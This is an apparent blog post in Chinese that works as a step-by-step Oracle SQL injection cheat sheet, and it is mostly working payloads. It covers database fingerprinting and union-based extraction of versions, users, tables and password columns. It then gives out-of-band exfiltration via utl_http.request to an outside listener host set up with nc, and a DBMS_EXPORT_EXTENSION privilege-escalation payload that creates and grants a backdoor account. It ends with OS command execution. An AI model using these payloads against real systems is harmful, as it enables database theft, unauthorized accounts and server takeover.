1.判断是否存在注入点的方法和其他数据库类似,and 1=1 和and 1=2
2.判断数据库为oracle
提交注释字符/*,返回正常即是MySQL,否则继续提交注释符号--,该符号是Oracle和MsSQL支持的注释符,返回正常就需要继续判断。可以继续提交多语句支持符号;如果支持多行查询,说明是MSSQL,因为Oracle不支持多行查询,可以继续提交查询语句:
and exist(select * from dual)
或
and (select count(*) from user_tables)>0--
利用的原理是dual表和user_tables表是oracle中的系统表,返回正常就判断为Oracle
3.获取基本信息
(1)获取字段数,同样可以使用oder by N 根据返回页面判断
(2)获取数据库版本,执行下面语句:
and 1=2 union select 1,2,(select banner from sys.v_$version where rownum=1),4,5,6 from dual
(3)获取数据库连接用户名
and 1=2 union select 1,2,(select SYS_CONTEXT('USERENV','CURRENT_USER') from dual),4,5,6 from dual
(4)获取日志文件的绝对路径,同样可以通过这个绝对判断系统类型
and 1=2 union select 1,2,(select instance_name from v$instance),4,5,6 from dual
4.和Mysql>=5.0和MsSQL>=2005的特性利用
(1)爆数据库名
# 爆出第一个数据库名
and 1=2 union select 1,2,(select owner from all_tables where rownum=1),4,5,6 from dual
# 依次爆出所有数据库名,假设第一个库名为first_dbname
and 1=2 union select 1,2,(select owner from all_tables where rownum=1 and owner<>'first_dbname'),4,5,6 from dual
(2)爆出表名
# 爆出第一个表名
and 1=2 union select 1,2,(select table_name from user_tables where rownum=1),4,5,6 from dual
同理,同爆出下一个数据库类似爆出下一个表名就不说了,但是必须注意表名用大写或者表名大写的十六进制代码。
有时候我们只想要某个数据库中含密码字段的表名,采用模糊查询语句,如下:
and (select column_name from user_tab_columns where column_name like '%25pass%25')>0
如果成功也可以继续提交
and 1=2 union select 1,2,(select column_name from user_tab_columns where column_name like '%25pass%25'),4,5,6 from dual
这也是猜解表名的一种方法,不过比上面方法麻烦。
(3)爆字段名
# 爆出表tablename中的第一个字段名
and 1=2 union select 1,2,(select column_name from user_tab_columns where table_name='tablename' and rownum=1),4,5,6 from dual
# 爆出第一个字段名
and 1=2 union select 1,2,(select column_name from user_tab_columns where table_name='tablename' and column_name<>'first_col_name' and rownum=1),4,5,6 from dual
这样就可以爆出所有的字段名了。
这样就可以和普通的注入一样获取字段内容了,就不多说了。
5.Oracle注入过程的特性
这点主要说明在Oracle注入中和其他数据库注入不大一样的几点说明。
(1)字段类型必须确定
oracle注入中严格要求各个字段的类型必须和定义的一致否则会出错,我们可以通过下面方法确定各个字段的类型。
and 1=2 union select 'null',null,null,null,null,null from dual
如此依次将下面的每个null用单引号替换,查看返回页面,返回正常说明那个字段为字符型。确定所有字段类型后就可以注入了, 是字符型的就用‘null’,数字型的就直接null
(2)UTL_HTTP存储过程反弹注入
oracle中提供utl_http.request的包函数,用于取得远程web服务器的请求信息,因为我们可以利用它来反弹回信息。再加上oracle本身经常是已system运行的,所以拿下了oracle基本拿下了服务器了。
具体使用方法如下:
# 判断UTL_HTTP存储搓成是否可用/**/这个地方原文有错 ,用count(*)无法判别函数是否存在,无论是否存在都会返回真,经过测试后,*可以判别
and exist(select * from all_objects where object_name='UTL_HTTP')
# 第一步,本地用nc监听一个端口
nc -vv -l -p 8989
# 注入点执行
and utl_http.request('http:// www.webshell.cc :port'||(SQL Query))=1
# 举个例子
and utl_http.request('http:// www.webshell.cc :port'||(select banner from sys.v_$version where rownum=1))=1--
在NC端就会接收到SQL执行返回的结果。这个有点麻烦,因为每次注入点提交一次请求有nc会断开连接,需要重新启动。
(3)系统特性
在不同的OS平台我们需要考虑到,在window下,oracle是已服务方式启动,在web注射下就可以直接获得system权限,Linux下虽然不是root不过权限也挺高的,可能可以通过web注射添加系统帐户。他们同样用到的函数是:
SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES()
具体的应用方法是
SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);[Attack-Command]END;--',SYS',0,'1',0)
将其中的Attack-Command替换成对应的命令即可,但是需要说明的是该利用方法必须结合上面的UTL_HTTP存储过程。
(4)注入点创建runCMD和文件操作
这个没有实践过不敢妄言,等有了实践再行补上
(5)创建远程连接帐号
注入点执行:
and '1'<>'2'||(select SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '' '' Create USER LengF IDENTIFIED BY LengF '' '';END;--',SYS',0,'1',0) from dual)
确定帐号是否添加成功:
and 1<>(select user_id from all_users where username='lengf')
赋予帐户远程连接权限:
and '1'<>'2'||(select SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '' '' GRANT CONNECT to LengF '' '';END;--',SYS',0,'1',0) from dual
删除帐号:
and '1'<>'2'||(select SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '' '' drop USER LengF '' '';END;--',SYS',0,'1',0) from dual
(6)命令执行
通过添加帐号或者其他手段获取远程连接权限后,利用SQLPUS连接后即可执行命令。
在window中使用:
host CMD # CMDw为具体命令,比如ipconfig
在Linux下可以使用:
!command CMD
当然除了这个方法执行命令外还可以通过导入导出表执行命令,比较麻烦感兴趣可以自己查。
Oracle注入危害还是很大的,甚至可以执行exploit代码,基本的应用和特性就这些了。
Oracle 注入基础及相关特性总结:https://www.webshell.cc/1220.html
oracle注入的高级用法以及报错注入以及cve https://www.iswin.org/2015/06/13/hack-oracle/
oracle注入常用Java语句 http://www.secange.com/2017/07/oracle%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4/
oracle原理和初始注入步骤http://latec0mer.com/archives/hacking-oracle-and-drop-database-run-away-basic.html
非常强的oralce注入分析 http://www.codeweblog.com/hacking-oracle-with-sql-injection/
网友评论